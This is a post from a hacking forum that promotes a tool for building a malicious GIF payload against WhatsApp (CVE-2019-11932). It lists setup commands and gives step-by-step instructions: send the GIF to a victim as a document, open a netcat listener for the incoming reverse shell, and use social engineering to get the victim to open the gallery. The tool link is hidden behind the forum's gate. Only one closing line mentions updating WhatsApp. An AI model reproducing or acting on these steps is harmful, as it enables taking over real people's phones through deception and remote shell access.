• We just launched and are currently in beta. Join us as we build and grow the community.

WhatsApp - Generate Payload for CVE-2019-11932▪ By Mr.HaMo

bobsyouruncle6661

OSINT Instructor
B Rep
0
0
0
Rep
0
B Vouches
0
0
0
Vouches
0
Posts
158
Likes
25
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 400 XP
▪WhatsApp - Generate Payload for CVE-2019-11932▪





Auto install GCC (no harm command, you can see this is open-source)
Saving to .GIF file

sudo apt install git
Tool link


You must upgrade your account or reply in the thread to view hidden text.


cd WhatsRCE && bash start.sh

or Watch Video -

You must upgrade your account or reply in the thread to view hidden text.


▪How Get Shell ?

You just send the .GIF file to victim user AS A DOCUMENT NOT IMAGES
And set the nc / netcat to port you set on the WhatsRCE tools {nc -lnvp your_port}
You can use the Social Engineering attack so that victims can be attracted to launch this exploit
tell the victim to open the gallery via whatsapp and send the victim to send any photos (no need, it's just got to the gallery no problem) after that a few seconds later you will receive a shell connection from the victim


How To Avoid This Attack?
Update your whatsapp to the latest version (Patched on Version 2.19.244)
how to receive any file including audio images and others from people we don't know
 

439,009

316,008

316,017

Top